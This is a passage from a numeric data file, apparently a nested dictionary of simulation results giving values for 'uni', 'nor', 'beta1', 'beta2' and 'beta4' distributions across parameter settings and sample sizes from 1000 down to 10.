0.07005566740115332, 'beta2': 0.12493758821402545, 'beta4': 0.05655427961943388}, 200: {'uni': 0.08649126875588486, 'nor': 0.14398532562620858, 'beta1': 0.08564125071746342, 'beta2': 0.13571236054952152, 'beta4': 0.07038554117278428}, 150: {'uni': 0.09972216582225901, 'nor': 0.15081713302440228, 'beta1': 0.0980320332573475, 'beta2': 0.14532447093659528, 'beta4': 0.08274587331420269}, 100: {'uni': 0.12039381304129049, 'nor': 0.16746812959278995, 'beta1': 0.12027519702689837, 'beta2': 0.16277345040644908, 'beta4': 0.10360078281945007}, 75: {'uni': 0.13935366553924022, 'nor': 0.18277769750800105, 'beta1': 0.13931147415294898, 'beta2': 0.17557555907632716, 'beta4': 0.120496470943599}, 50: {'uni': 0.17045968935190703, 'nor': 0.2061624163310195, 'beta1': 0.16850089401261617, 'beta2': 0.20076750567324442, 'beta4': 0.1524439268490353}, 30: {'uni': 0.21706058239993287, 'nor': 0.24724662889782345, 'beta1': 0.21628695050401275, 'beta2': 0.2432570996508593, 'beta4': 0.2007074069679156}, 20: {'uni': 0.2644244349370678, 'nor': 0.2888841367890824, 'beta1': 0.2655430776294785, 'beta2': 0.2844954992477471, 'beta4': 0.24845905058828244}, 10: {'uni': 0.3691891891585487, 'nor': 0.38713991936611614, 'beta1': 0.36692723160862345, 'beta2': 0.38140488493099745, 'beta4': 0.3576454464109796}}, 30: {1000: {'uni': 0.045457677191963586, 'nor': 0.1457355582484376, 'beta1': 0.038546756955813, 'beta2': 0.1200679160771897, 'beta4': 0.030100677632104778}, 750: {'uni': 0.04995866353212569, 'nor': 0.14761791285414627, 'beta1': 0.044554754363745674, 'beta2': 0.12224473120434098, 'beta4': 0.03495775636349063}, 500: {'uni': 0.05880880623556495, 'nor': 0.15281360983908227, 'beta1': 0.05437068025855424, 'beta2': 0.12753056289514525, 'beta4': 0.0428449240771841}, 400: {'uni': 0.0645126168303099, 'nor': 0.15525355878197838, 'beta1': 0.061035794772328456, 'beta2': 0.1318918900818361, 'beta4': 0.048131670902745394}, 300: {'uni': 0.0736981524234896, 'nor': 0.16102927114194954, 'beta1': 0.0699378076866422, 'beta2': 0.1359450077822285, 'beta4': 0.055744371538938964}, 200: {'uni': 0.08801073759496875, 'nor': 0.16994023103299272, 'beta1': 0.08505228657724262, 'beta2': 0.1463769299335057, 'beta4': 0.06912750948895652}, 150: {'uni': 0.10119998770539862, 'nor': 0.17809227114576442, 'beta1': 0.09846662120153019, 'beta2': 0.1563069707446343, 'beta4': 0.0804849907703572}, 100: {'uni': 0.12165160638390676, 'nor': 0.1925681843339241, 'beta1': 0.12041960699493481, 'beta2': 0.17156822159027985, 'beta4': 0.10014130433781748}, 75: {'uni': 0.13975451811748224, 'nor': 0.2056309659993777, 'beta1': 0.13866205873705784, 'beta2': 0.1837990537785728, 'beta4': 0.11619303536405938}, 50: {'uni': 0.1707628459531228, 'nor': 0.22834518013555266, 'beta1': 0.16826103008208187, 'beta2': 0.20898788453415473, 'beta4': 0.1459501849665349}, 30: {'uni': 0.21737854401306778, 'nor': 0.2651944679135494, 'beta1': 0.2169374533538973, 'beta2': 0.24814946824995282, 'beta4': 0.19477597502585953}, 20: {'uni': 0.26172292368747657, 'nor': 0.30251728219002344, 'beta1': 0.2644484410276723, 'beta2': 0.29110454324712, 'beta4': 0.24126464705741385}, 10: {'uni': 0.3667581652322965, 'nor': 0.40279126451218983, 'beta1': 0.3692768516896085, 'beta2': 0.3866633789743732, 'beta4': 0.34861300659940814}}, 20: {1000: {'uni': 0.05370924654054801, 'nor': 0.17648599487397, 'beta1': 0.04804540228549625, 'beta2': 0.1343446649365414, 'beta4': 0.02997352312939844}, 750: {'uni': 0.05729122370623074, 'nor': 0.1803587541418622, 'beta1': 0.04812500176891543, 'beta2': 0.13786905650664827, 'beta4': 0.03477191515013617}, 500: {'uni': 0.06464930552073, 'nor': 0.18336329212636393, 'beta1': 0.05469422873209995, 'beta2': 0.14239511606905197, 'beta4': 0.04271981408076597}, 400: {'uni': 0.06986628923619037, 'nor': 0.18625313891095058, 'beta1': 0.06071158332876331, 'beta2': 0.14471049421579463, 'beta4': 0.047627222949097936}, 300: {'uni': 0.0777256622725595, 'nor': 0.18953337250453745, 'beta1': 0.070054764465032, 'beta2': 0.1512744075762968, 'beta4': 0.0552010190871432}, 200: {'uni': 0.09158087111218582, 'nor': 0.19800738103301052, 'beta1': 0.0864137923024384, 'beta2': 0.15931545015663917, 'beta4': 0.06814299912620103}, 150: {'uni': 0.10335435452469321, 'nor': 0.2054309649794448, 'beta1': 0.09892077062896198, 'beta2': 0.16793211210769832, 'beta4': 0.07953126024663426}, 100: {'uni': 0.12424516715196299, 'nor': 0.21856150700189325, 'beta1': 0.12057266069376027, 'beta2': 0.18383332726712043, 'beta4': 0.09738694233698236}, 75: {'uni': 0.1417104597444815, 'nor': 0.23034885885084855, 'beta1': 0.13841928094108402, 'beta2': 0.1968525929870979, 'beta4': 0.1150925954043509}, 50: {'uni': 0.17111110661077933, 'nor': 0.2524518773718313, 'beta1': 0.17046731006299556, 'beta2': 0.21788191331659196, 'beta4': 0.14222869732898685}, 30: {'uni': 0.21687551224414225, 'nor': 0.28926214134356854, 'beta1': 0.21629470859709887, 'beta2': 0.25673815181901094, 'beta4': 0.1892955689821264}, 20: {'uni': 0.26430445397421665, 'nor': 0.3247388087097957, 'beta1': 0.2638148393051306, 'beta2': 0.29743250866558657, 'beta4': 0.23622944016863467}, 10: {'uni': 0.36737909439043254, 'nor': 0.4125208499637192, 'beta1': 0.3660874383968239, 'beta2': 0.38838554766199895, 'beta4': 0.3439063586015456}}, 10: {1000: {'uni': 0.08862146976790009, 'nor': 0.2535995199262815, 'beta1': 0.09069671581521854, 'beta2': 0.16803506355157516, 'beta4': 0.029921859317868282}, 750: {'uni': 0.08977033393809541, 'nor': 0.254580496609131, 'beta1': 0.09071297119014299, 'beta2': 0.1691038026265949, 'beta4': 0.034510090116727565}, 500: {'uni': 0.09238549230306914, 'nor': 0.25987057271300046, 'beta1': 0.09073934473664924, 'beta2': 0.17440911430930217, 'beta4': 0.04213161613017047}, 400: {'uni': 0.09459196287285188, 'nor': 0.26027933684777826, 'beta1': 0.09074209915698388, 'beta2': 0.17593382577625938, 'beta4': 0.04768105187754579}, 300: {'uni': 0.09917712584623528, 'nor': 0.2615501480076419, 'beta1': 0.09091594609476689, 'beta2': 0.1805409357764428, 'beta4': 0.05498060190263093}, 200: {'uni': 0.10872992256114376, 'nor': 0.2695197969164528, 'beta1': 0.09138518619528078, 'beta2': 0.18687142652551247, 'beta4': 0.06740841503327016}, 150: {'uni': 0.11782830618505136, 'nor': 0.2762185043437084, 'beta1': 0.10051161390790297, 'beta2': 0.1942070856751601, 'beta4': 0.07819221056213072}, 100: {'uni': 0.13438399664084844, 'nor': 0.28816303619228323, 'beta1': 0.12084090735087949, 'beta2': 0.20547572552005522, 'beta4': 0.09570415694090936}, 75: {'uni': 0.15023870303077683, 'nor': 0.2958611782293753, 'beta1': 0.1395907599244337, 'beta2': 0.21686046108693185, 'beta4': 0.11050164335769763}, 50: {'uni': 0.1782266716766201, 'nor': 0.3141960877725066, 'beta1': 0.16859036565221908, 'beta2': 0.24007665604305778, 'beta4': 0.13764276895735614}, 30: {'uni': 0.22096576164827378, 'nor': 0.3459767153505968, 'beta1': 0.21633032217123638, 'beta2': 0.27349437174891433, 'beta4': 0.18066617575900545}, 20: {'uni': 0.26383403962743235, 'nor': 0.37594074244986514, 'beta1': 0.26301385683685513, 'beta2': 0.3103976354263712, 'beta4': 0.22515639301084087}, 10: {'uni': 0.3664196082159237, 'nor': 0.45714739810989896, 'beta1': 0.3636555139455243, 'beta2': 0.3974337064021698, 'beta4': 0.3276445784663552}}}, 0.2: {1000: {1000: {'uni': 0.03388738157245541, 'nor': 0.04015666897414438, 'beta1': 0.03355667375414395, 'beta2': 0.055574500180284314, 'beta4': 0.03068120985677973}, 750: {'uni': 0.03899522828726909, 'nor': 0.04482662034784124, 'beta1': 0.038906952257139416, 'beta2': 0.0577336142241367, 'beta4': 0.035726625386190314}, 500: {'uni': 0.047776296371012106, 'nor': 0.0524414607908541, 'beta1': 0.04779122142786796, 'beta2': 0.06290813245562621, 'beta4': 0.04449308639070271}, 400: {'uni': 0.05336721519256357, 'nor': 0.05743278486341408, 'beta1': 0.053125312827925875, 'beta2': 0.06632258983296924, 'beta4': 0.05071787362274782}, 300: {'uni': 0.0613357895908182, 'nor': 0.06550100428584399, 'beta1': 0.06109741329317647, 'beta2': 0.07293163000037511, 'beta4': 0.05908868335670159}, 200: {'uni': 0.07501845542232805, 'nor': 0.07876069039917577, 'beta1': 0.07500276171787268, 'beta2': 0.08419855412256849, 'beta4': 0.07278561303210473}, 150: {'uni': 0.08634506901837877, 'nor': 0.08904521157666112, 'beta1': 0.08632477062450605, 'beta2': 0.09453176706786948, 'beta4': 0.08472926033937267}, 100: {'uni': 0.1057124222050787, 'nor': 0.10808546837916216, 'beta1': 0.10516591278839627, 'beta2': 0.11170808920861064, 'beta4': 0.10393226778652609}, 75: {'uni': 0.12149208320718635, 'nor': 0.12306907509286319, 'beta1': 0.12209431187926248, 'beta2': 0.12646902554095174, 'beta4': 0.12019336772939093}, 50: {'uni': 0.14783464657037992, 'nor': 0.14989562158896733, 'beta1': 0.14870430658867798, 'beta2': 0.15298471478505016, 'beta4': 0.14675275578661956}, 30: {'uni': 0.19121204259605487, 'nor': 0.19161889709583674, 'beta1': 0.18958426307805673, 'beta2': 0.19343552624644, 'beta4': 0.18882942312354808}, 20: {'uni': 0.23271862737098403, 'nor': 0.23131945605660487, 'beta1': 0.23084583243478113, 'beta2': 0.2339139193810307, 'beta4': 0.23046342255270594}, 10: {'uni': 0.3225715177370052, 'nor': 0.32210711594806274, 'beta1': 0.32134895787627404, 'beta2': 0.32533513676914994, 'beta4': 0.32219881278226875}}, 750: {1000: {'uni': 0.03376714362696076, 'nor': 0.042024347317684174, 'beta1': 0.03369092286126596, 'beta2': 0.055889726610143464, 'beta4': 0.03024928592128745}, 750: {'uni': 0.03891496409139339, 'nor': 0.046131807231977684, 'beta1': 0.038847267411021014, 'beta2': 0.05801346441223432, 'beta4': 0.035253753207794225}, 500: {'uni': 0.04749484005992066, 'nor': 0.05359269975534858, 'beta1': 0.04758858015566003, 'beta2': 0.06257170586617439, 'beta4': 0.044068141367767266}, 400: {'uni': 0.05297468125525839, 'nor': 0.05926387355580798, 'beta1': 0.05295355833022475, 'beta2': 0.0666115313485337, 'beta4': 0.04992787350991934}, 300: {'uni': 0.06112594909603697, 'nor': 0.06629753648545333, 'beta1': 0.06138650353983818, 'beta2': 0.07343192849203295, 'beta4': 0.05810524207749168}, 200: {'uni': 0.07490063551528908, 'nor': 0.07942685260233576, 'beta1': 0.07438999529385071, 'beta2': 0.08515842923668693, 'beta4': 0.07205056427377587}, 150: {'uni': 0.08639622501196301, 'nor': 0.08962430009180156, 'beta1': 0.08575239384506436, 'beta2': 0.09486183374614099, 'beta4': 0.0835611646348291}, 100: {'uni': 0.10581425933251165, 'nor': 0.10810039846104558, 'beta1': 0.10589792403845494, 'beta2': 0.11188037819837482, 'beta4': 0.10306934411821278}, 75: {'uni': 0.1214540209799046, 'nor': 0.12485134735341119, 'beta1': 0.12141611216283932, 'beta2': 0.12662789787139295, 'beta4': 0.11982036085184888}, 50: {'uni': 0.14841865927342057, 'nor': 0.15115605407635108, 'beta1': 0.14882335320078816, 'beta2': 0.15301035196557927, 'beta4': 0.14740389167526288}, 30: {'uni': 0.19055206451646386, 'nor': 0.19229401661443357, 'beta1': 0.19006065116918158, 'beta2': 0.19466607401258693, 'beta4': 0.18866007451684785}, 20: {'uni': 0.23100251462520283, 'nor': 0.23351937614410023, 'beta1': 0.23055792133077502, 'beta2': 0.23429666500235652, 'beta4': 0.23068072631463016}, 10: {'uni': 0.321735912802274, 'nor': 0.32423692759003264, 'beta1': 0.3239617966140733, 'beta2': 0.32437308055517045, 'beta4': 0.3249136529859552}}, 500: {1000: {'uni': 0.03361099658500921, 'nor': 0.045330398129452165, 'beta1': 0.03371228816752819, 'beta2': 0.05832511086354275, 'beta4': 0.029273019646634646}, 750: {'uni': 0.038816575943483644, 'nor': 0.0491504214333881, 'beta1': 0.039015892770372096, 'beta2': 0.060770948426164983, 'beta4': 0.034501276617158405}, 500: {'uni': 0.04815961880455866, 'nor': 0.05646388049918538, 'beta1': 0.047616095765788624, 'beta2': 0.06578607920387605, 'beta4': 0.043089689535904585}, 400: {'uni': 0.053452201672102295, 'nor': 0.06153375349484047, 'beta1': 0.052983040292405525, 'beta2': 0.07031702338528978, 'beta4': 0.048637574479821644}, 300: {'uni': 0.06127370649997177, 'nor': 0.06874638836387548, 'beta1': 0.06133068039745698, 'beta2': 0.07561704434900895, 'beta4': 0.057273437560509066}, 200: {'uni': 0.07472226953381489, 'nor': 0.08105755495025313, 'beta1': 0.07504375951495804, 'beta2': 0.0877176493907923, 'beta4': 0.07144906208708657}, 150: {'uni': 0.08655826756432694, 'nor': 0.09209107605088962, 'beta1': 0.08700099545101375, 'beta2': 0.09953347989595823, 'beta4': 0.08270140680266824}, 100: {'uni': 0.10589569548753086, 'nor': 0.11067808441589783, 'beta1': 0.10570360745340612, 'beta2': 0.11521549542004672, 'beta4': 0.10204817369562785}, 75: {'uni': 0.1214238464236953, 'nor': 0.1257918905040879, 'beta1': 0.12201308622504331, 'beta2': 0.12918412209535224, 'beta4': 0.1184359299309477}, 50: {'uni': 0.14801176067778704, 'nor': 0.15169848925285823, 'beta1': 0.1490310518112693, 'beta2': 0.15460147219717485, 'beta4': 0.14566535210883857}, 30: {'uni': 0.19132874999388066, 'nor': 0.19329023907863613, 'beta1': 0.1907485547222172, 'beta2': 0.1941783283376482, 'beta4': 0.18736708420254317}, 20: {'uni': 0.23282248165413844, 'nor': 0.232655718238027, 'beta1': 0.23254110249310414, 'beta2': 0.23479815552622696, 'beta4': 0.22895872572703413}, 10: {'uni': 0.3238030709255784, 'nor': 0.32527484356803527, 'beta1': 0.32251033930915673, 'beta2': 0.325462541104486, 'beta4': 0.3216777112141702}}, 400: {1000: {'uni': 0.03386042788512955, 'nor': 0.047710828017344276, 'beta1': 0.0337310904928686, 'beta2': 0.05890009367362975, 'beta4': 0.029040534438643628}, 750: {'uni': 0.03904468308757758, 'nor': 0.051551219035761986, 'beta1': 0.03885610324170258, 'beta2': 0.0606985856416401, 'beta4': 0.0340554853290308}, 500: {'uni': 0.047602093704168735, 'nor': 0.05814584365187403, 'beta1': 0.04748869924936838, 'beta2': 0.06611742375228202, 'beta4': 0.04271018009250971}, 400: {'uni': 0.05304223077370851, 'nor': 0.06292081768546079, 'beta1': 0.05279164279598325, 'beta2': 0.07002077573100743, 'beta4': 0.04866770038722679}, 300: {'uni': 0.06141397119642633, 'nor': 0.07030627117167121, 'beta1': 0.06097126432087274, 'beta2': 0.07635636078134611, 'beta4': 0.056339224324690684}, 200: {'uni': 0.07503889889243953, 'nor': 0.08238702118585328, 'beta1': 0.07494642001255589, 'beta2': 0.08906360121274909, 'beta4': 0.07041606833950242}, 150: {'uni': 0.08650534294392143, 'nor': 0.09368577651895194, 'beta1': 0.08609035232292472, 'beta2': 0.09880346197322298, 'beta4': 0.08192514174926191}, 100: {'uni': 0.10554211559941079, 'nor': 0.11085547265078599, 'beta1': 0.10592424086268526, 'beta2': 0.11560686173795065, 'beta4': 0.10181407800596476}, 75: {'uni': 0.12118585486438052, 'nor': 0.12734779642511718, 'beta1': 0.12111707280276551, 'beta2': 0.1305965998046278, 'beta4': 0.11787930087738932}, 50: {'uni': 0.14797599649230353, 'nor': 0.15171514649116935, 'beta1': 0.1484099702342504, 'beta2': 0.15541609636822673, 'beta4': 0.14510227576798918}, 30: {'uni': 0.19021549568018936, 'nor': 0.1933618553897194, 'beta1': 0.1907191702304276, 'beta2': 0.19541117767136984, 'beta4': 0.18755377058130973}, 20: {'uni': 0.23146197858779916, 'nor': 0.23407289720723795, 'beta1': 0.23230655807246425, 'beta2': 0.23567907159586732, 'beta4': 0.2291439538234219}, 10: {'uni': 0.3221026192917168, 'nor': 0.3245602129335199, 'beta1': 0.32277705217495795, 'beta2': 0.3261921289212465, 'beta4': 0.32191737143798144}}, 300: {1000: {'uni': 0.033695118131507495, 'nor': 0.05091916329512536, 'beta1': 0.03393619351717603, 'beta2': 0.06057179016027847, 'beta4': 0.0285990426293512}, 750: {'uni': 0.03910414563500947, 'nor': 0.05465137245133267, 'beta1': 0.038816776120210894, 'beta2': 0.06313897920954847, 'beta4': 0.033354645226166046}, 500: {'uni': 0.04762543649309181, 'nor': 0.06159887019353166, 'beta1': 0.04780391171257714, 'beta2': 0.0681292524818165, 'beta4': 0.04184091667546608}, 400: {'uni': 0.05345378246611335, 'nor': 0.06617151036624425, 'beta1': 0.05302241280194575, 'beta2': 0.07278816401083432, 'beta4': 0.04729132105092715}, 300: {'uni': 0.06133399743947998, 'nor': 0.0731521981557415, 'beta1': 0.061595854882960877, 'beta2': 0.08129842890779082, 'beta4': 0.055524597397617226}, 200: {'uni': 0.07473088765308139, 'nor': 0.0848296423748201, 'beta1': 0.07519297407714975, 'beta2': 0.09105884496116406, 'beta4': 0.06951013639767534}, 150: {'uni': 0.08667661820391337, 'nor': 0.09523718870586606, 'beta1': 0.08692359414490303, 'beta2': 0.10060898747715086, 'beta4': 0.08103195453051082}, 100: {'uni': 0.10553388362967905, 'nor': 0.11381051637354644, 'beta1': 0.10561397962134611, 'beta2': 0.11792834991131423, 'beta4': 0.10090718775359064}, 75: {'uni': 0.12155221095133384, 'nor': 0.12793878242727197, 'beta1': 0.1215592598705928, 'beta2': 0.1322756449085521, 'beta4': 0.1168330578874448}, 50: {'uni': 0.14804683077762326, 'nor': 0.15419659403457153, 'beta1': 0.14866575944705585, 'beta2': 0.15751859961478853, 'beta4': 0.14405280732471298}, 30: {'uni': 0.19026263588328451, 'nor': 0.19412845565379028, 'beta1': 0.19049550527182446, 'beta2': 0.196939457774988, 'beta4': 0.1866360117186579}, 20: {'uni': 0.2313876995850297, 'nor': 0.23502769104830612, 'beta1': 0.23105225723665046, 'beta2': 0.23608963938520033, 'beta4': 0.2292267482273611}, 10: {'uni': 0.3221120205638056, 'nor': 0.3243045336872488, 'beta1': 0.3208731593800577, 'beta2': 0.3252380584126876, 'beta4': 0.31984201603154766}}, 200: {1000: {'uni': 0.03389126620048066, 'nor': 0.05765077575778865, 'beta1': 0.03376008405740816, 'beta2': 0.06437824504169704, 'beta4': 0.0279614561315292}, 750: {'uni': 0.03903612475565288, 'nor': 0.06067305171910875, 'beta1': 0.039025478836297256, 'beta2': 0.06680002944624919, 'beta4': 0.03292291515427731}, 500: {'uni': 0.04775932391254628, 'nor': 0.06680855125140311, 'beta1': 0.04777372167795524, 'beta2': 0.0730432372041967, 'beta4': 0.04099670926553012}, 400: {'uni': 0.053169992426212453, 'nor': 0.07130050098050561, 'beta1': 0.053126182451097015, 'beta2': 0.07958454016209743, 'beta4': 0.046411644412640785}, 300: {'uni': 0.06084117394290545, 'nor': 0.07778044249500193, 'beta1': 0.06160223598764697, 'beta2': 0.08429495593767933, 'beta4': 0.05440016577981527}, 200: {'uni': 0.07486690598932355, 'nor': 0.09015651052130147, 'beta1': 0.0750283211417685, 'beta2': 0.09516934496985152, 'beta4': 0.06768527669021038}, 150: {'uni': 0.08629721643574545, 'nor': 0.0993067628049017, 'beta1': 0.08668817140327162, 'beta2': 0.10516268131208634, 'beta4': 0.07953728925132197}, 100: {'uni': 0.10546884892973363, 'nor': 0.1168548961678525, 'beta1': 0.10626217079796596, 'beta2': 0.1204989099383002, 'beta4': 0.09903875776592275}, 75: {'uni': 0.12168012164046638, 'nor': 0.1314303884963226, 'beta1': 0.12214826537759482, 'beta2': 0.1351994296696919, 'beta4': 0.1149866262333511}, 50: {'uni': 0.14782352233644408, 'nor': 0.15754764223117135, 'beta1': 0.14825063238007496, 'beta2': 0.15841952571485496, 'beta4': 0.14294406590744546}, 30: {'uni': 0.19048227877938156, 'nor': 0.1967417135295928, 'beta1': 0.18997647207879326, 'beta2': 0.1985375655182654, 'beta4': 0.1860365582166873}, 20: {'uni': 0.23118653990494603, 'nor': 0.2362845426246003, 'beta1': 0.23216547900931916, 'beta2': 0.23821825980001504, 'beta4': 0.22782447476862544}, 10: {'uni': 0.3211281593663615, 'nor': 0.32606182576485077, 'beta1': 0.3236233700149418, 'beta2': 0.32878598247569857, 'beta4': 0.3207221077913689}}, 150: {1000: {'uni': 0.03396456507138623, 'nor': 0.0630608330646778, 'beta1': 0.0337277801465099, 'beta2': 0.06770210959513101, 'beta4': 0.02782320511153541}, 750: {'uni': 0.03910044490462494, 'nor': 0.06648103251076115, 'beta1': 0.03880293828339021, 'beta2': 0.07044578061655482, 'beta4': 0.032404976904047755}, 500: {'uni': 0.047957863191993855, 'nor': 0.07218240504190596, 'beta1': 0.04756246411890541, 'beta2': 0.07886065014379595, 'beta4': 0.04025719542113432}, 400: {'uni': 0.05359261424909634, 'nor': 0.07672357193415957, 'beta1': 0.053195230735709365, 'beta2': 0.08232822341436707, 'beta4': 0.045660798052570645}, 300: {'uni': 0.06095634560530494, 'nor': 0.08246385189061045, 'beta1': 0.06158333945371208, 'beta2': 0.08770721726682829, 'beta4': 0.053329443870827636}, 200: {'uni': 0.07542313957478985, 'nor': 0.09376844697035747, 'beta1': 0.07502483861611764, 'beta2': 0.09930331490997918, 'beta4': 0.06676883228264996}, 150: {'uni': 0.08612997994268534, 'nor': 0.10304658085927404, 'beta1': 0.08676278127457426, 'beta2': 0.10801928051315668, 'beta4': 0.07857687034701241}, 100: {'uni': 0.10487250667170855, 'nor': 0.11932842046669623, 'beta1': 0.10614742264977517, 'beta2': 0.1240130501571779, 'beta4': 0.09727175686115075}, 75: {'uni': 0.12125587425148476, 'nor': 0.13477382757210765, 'beta1': 0.12123394920739405, 'beta2': 0.13735136783257884, 'beta4': 0.11414306692306875}, 50: {'uni': 0.14807161438081134, 'nor': 0.15892016658734387, 'beta1': 0.148560766937952, 'beta2': 0.16159831870181401, 'beta4': 0.1417900094042981}, 30: {'uni': 0.18999549214586064, 'nor': 0.19904964098027866, 'beta1': 0.19071102883002822, 'beta2': 0.20019795935043838, 'beta4': 0.18394814557977696}, 20: {'uni': 0.2315147837574712, 'nor': 0.23783415188052248, 'beta1': 0.2324397659800763, 'beta2': 0.23998185635535838, 'beta4': 0.22593857547727642}, 10: {'uni': 0.3219852137932768, 'nor': 0.32723676254678064, 'beta1': 0.32356225696956475, 'beta2': 0.3269691590497776, 'beta4': 0.3198335598449822}}, 100: {1000: {'uni': 0.03411194849559385, 'nor': 0.07287242105906888, 'beta1': 0.03382125829922744, 'beta2': 0.07002374839528969, 'beta4': 0.027407494662168852}, 750: {'uni': 0.03938154082727641, 'nor': 0.07580278019762332, 'beta1': 0.039103170488301364, 'beta2': 0.07321818422715465, 'beta4': 0.03188744748160627}, 500: {'uni': 0.04778928237643254, 'nor': 0.08110701684552524, 'beta1': 0.047810374146142864, 'beta2': 0.08203011864750759, 'beta4': 0.03952324078463222}, 400: {'uni': 0.0534810053390774, 'nor': 0.08508194249549039, 'beta1': 0.05352127702635723, 'beta2': 0.08537754830278577, 'beta4': 0.04481417769901397}, 300: {'uni': 0.06166341110979501, 'nor': 0.09150201948101794, 'beta1': 0.06113077709028425, 'beta2': 0.09038186391687197, 'beta4': 0.05211846493236742}, 200: {'uni': 0.07520911700485444, 'nor': 0.10091005418742754, 'beta1': 0.07506822671283137, 'beta2': 0.10171318740985519, 'beta4': 0.06518371829303138}, 150: {'uni': 0.08676252704286641, 'nor': 0.109975580477785, 'beta1': 0.08644340439225118, 'beta2': 0.11178799632878333, 'beta4': 0.07633395622902756}, 100: {'uni': 0.10629645295984264, 'nor': 0.1258041278664646, 'beta1': 0.10529533439068595, 'beta2': 0.12702981218946555, 'beta4': 0.09569346182437452}, 75: {'uni': 0.12112331247638874, 'nor': 0.14051961004379154, 'beta1': 0.12250367446398408, 'beta2': 0.1419312079891245, 'beta4': 0.11164814343344687}, 50: {'uni': 0.14850915109683305, 'nor': 0.164857883156725, 'beta1': 0.14797844957977346, 'beta2': 0.16537134374996698, 'beta4': 0.13887660533943375}, 30: {'uni': 0.19061314919489092, 'nor': 0.20238067255048653, 'beta1': 0.1898804661221951, 'beta2': 0.2034759671609193, 'beta4': 0.18169040960889707}, 20: {'uni': 0.23206346175230053, 'nor': 0.24178386379175654, 'beta1': 0.2312278955520718, 'beta2': 0.24112122817067416, 'beta4': 0.22539667105811617}, 10: {'uni': 0.3196702240237979, 'nor': 0.33251158834688327, 'beta1': 0.32295889633274955, 'beta2': 0.328393531993296, 'beta4': 0.31666570512538683}}, 75: {1000: {'uni': 0.03485783601744907, 'nor': 0.08051567869925941, 'beta1': 0.033648744067629854, 'beta2': 0.07403441562434876, 'beta4': 0.02718882272100026}, 750: {'uni': 0.039971273861006185, 'nor': 0.08378469794057, 'beta1': 0.03914992626191016, 'beta2': 0.07629409467461495, 'beta4': 0.03167459557515717}, 500: {'uni': 0.04814188204423331, 'nor': 0.08871034088415142, 'beta1': 0.04758674792285417, 'beta2': 0.08541839890028591, 'beta4': 0.03925920431586538}, 400: {'uni': 0.054007658904476896, 'nor': 0.09269490981804712, 'beta1': 0.05325465974697008, 'beta2': 0.08787830915620459, 'beta4': 0.04425711117117276}, 300: {'uni': 0.06166042307350328, 'nor': 0.09814136406424179, 'beta1': 0.06140103113984097, 'beta2': 0.0953246518668952, 'beta4': 0.05161170153868877}, 200: {'uni': 0.07533722846773899, 'nor': 0.1076845305009698, 'beta1': 0.07475323397653444, 'beta2': 0.10614951521713306, 'beta4': 0.06424476858167916}, 150: {'uni': 0.08661147103718747, 'nor': 0.11679904366669902, 'beta1': 0.0862468564230863, 'beta2': 0.11532702446321819, 'beta4': 0.07558718090110728}, 100: {'uni': 0.1052555935603583, 'nor': 0.13183406809273956, 'beta1': 0.10578415846309697, 'beta2': 0.13050924243730755, 'beta4': 0.0937872652849821}, 75: {'uni': 0.12126435398082328, 'nor': 0.14504840369414934, 'beta1': 0.12158416691242752, 'beta2': 0.14424291715318288, 'beta4': 0.11036706757812237}, 50: {'uni': 0.14834069782758857, 'nor': 0.16807773831916928, 'beta1': 0.1488517171705721, 'beta2': 0.16739872482395307, 'beta4': 0.13691632557397643}, 30: {'uni': 0.19058841526927756, 'nor': 0.2065490922203851, 'beta1': 0.1901874541797639, 'beta2': 0.20483694072987557, 'beta4': 0.1806171436449474}, 20: {'uni': 0.23088484153300304, 'nor': 0.24560591918060148, 'beta1': 0.23134779605096323, 'beta2': 0.24365102169836095, 'beta4': 0.22264414971371438}, 10: {'uni': 0.3223581507118726, 'nor': 0.3333247832694408, 'beta1': 0.3216527474966696, 'beta2': 0.33129856873943275, 'beta4': 0.31612481972111983}}, 50: {1000: {'uni': 0.03610852487574101, 'nor': 0.0960874267256373, 'beta1': 0.033752114731624816, 'beta2': 0.0812415823085737, 'beta4': 0.0271620542706206}, 750: {'uni': 0.04093834200462532, 'nor': 0.09793556503751522, 'beta1': 0.03893376090817102, 'beta2': 0.08431844210129946, 'beta4': 0.03135962540422432}, 500: {'uni': 0.049336171986172905, 'nor': 0.10301434196794912, 'beta1': 0.04759746865566261, 'beta2': 0.09139711532965078, 'beta4': 0.03862301968563475}, 400: {'uni': 0.05463463924511991, 'nor': 0.10682402764821919, 'beta1': 0.05340709570203017, 'beta2': 0.0936397826733697, 'beta4': 0.04355260412773232}, 300: {'uni': 0.0623466502897439, 'nor': 0.11107955757096866, 'beta1': 0.06138170680347399, 'beta2': 0.10123250462805955, 'beta4': 0.05033595962483417}, 200: {'uni': 0.07554749668228766, 'nor': 0.12086678162054343, 'beta1': 0.0750416632363875, 'beta2': 0.11066959713661007, 'beta4': 0.0628060062760799}, 150: {'uni': 0.08739996958985385, 'nor': 0.12869541233213377, 'beta1': 0.08678659184299659, 'beta2': 0.12101764597314102, 'beta4': 0.07333451117705557}, 100: {'uni': 0.1059059556833244, 'nor': 0.1439095892813752, 'beta1': 0.10502496284200347, 'beta2': 0.1363796007125728, 'beta4': 0.09183606784698817}, 75: {'uni': 0.12175423531083684, 'nor': 0.15563413203809512, 'beta1': 0.12147657892364672, 'beta2': 0.1499620639515612, 'beta4': 0.10751782011418409}, 50: {'uni': 0.14800126374665257, 'nor': 0.17897180334401325, 'beta1': 0.14816290217139777, 'beta2': 0.1722281185648024, 'beta4': 0.1346224305003566}, 30: {'uni': 0.1887615721783148, 'nor': 0.21543468889014744, 'beta1': 0.190646670636544, 'beta2': 0.20948680711825576, 'beta4': 0.176259226549204}, 20: {'uni': 0.23023189652909293, 'nor': 0.2526685251360331, 'beta1': 0.23189889525873808, 'beta2': 0.2466910520448944, 'beta4': 0.2191893725919991}, 10: {'uni': 0.32299804783142616, 'nor': 0.3385208191642214, 'beta1': 0.3240970373299222, 'beta2': 0.330246772124018, 'beta4': 0.3131856367832769}}, 30: {1000: {'uni': 0.04055798585870418, 'nor': 0.12045878407806199, 'beta1': 0.03391282668139051, 'beta2': 0.09043202391168703, 'beta4': 0.026772664648918143}, 750: {'uni': 0.04458498964957813, 'nor': 0.12145350900121721, 'beta1': 0.03914910293909302, 'beta2': 0.0935565637316701, 'beta4': 0.031080040721369384}, 500: {'uni': 0.05222341973082678, 'nor': 0.1268382821804781, 'beta1': 0.04777032892633393, 'beta2': 0.09990217329576723, 'beta4': 0.03819481473884745}, 400: {'uni': 0.056861508270290684, 'nor': 0.12942238770629788, 'beta1': 0.0532675354399576, 'beta2': 0.10316552318518735, 'beta4': 0.042868749065423484}, 300: {'uni': 0.06457084720883632, 'nor': 0.13351603952339597, 'beta1': 0.061361887130497395, 'beta2': 